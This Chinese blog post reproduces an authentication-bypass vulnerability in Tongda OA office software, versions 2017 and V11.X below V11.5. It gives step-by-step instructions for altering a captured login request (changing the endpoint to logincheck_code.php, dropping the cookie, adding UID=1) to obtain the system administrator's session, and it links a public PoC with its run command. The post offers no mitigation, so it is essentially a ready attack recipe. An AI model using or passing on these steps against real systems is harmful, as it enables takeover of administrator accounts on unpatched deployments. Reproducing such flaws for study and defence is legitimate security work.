4.22通达oa获取任意用户session登录复现

简述

通达OA是北京通达信科科技有限公司出品的 "Office Anywhere 通达网络智能办公系统"。
该漏洞可获取任意用户session,包括系统管理员

影响范围

通达OA2017
V11.X<V11.5

手工复现

测试版本2017

  1. 抓登陆包

  2. 修改再发包
    三处地方需要修改:

  • logincheck.php=>/logincheck_code.php
  • cookie删掉
  • POST包里加个UID=1

返回的session就是对应UID用户的session
UID=1就是系统管理员
3. 替换cookie登录

访问/general/

poc测试

https://github.com/NS-Sp4ce/TongDaOA-Fake-User
python3 POC.py -v (2017|11) -url url

另一处利用方法

https://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&mid=2652477208&idx=1&sn=0bb9ed324bcc49dfd07bc5e22c3f66aa&chksm=f25834abc52fbdbd7043bb4b50c80fce3de9b24a509f31480310e4a8fc3dc3b292599829cab4&mpshare=1&scene=23&srcid=&sharer_sharetime=1592631445187&sharer_shareid=573e169d70351017c968db63a63c0ed9#rd

原文地址:https://www.cnblogs.com/Rain99-/p/12762755.html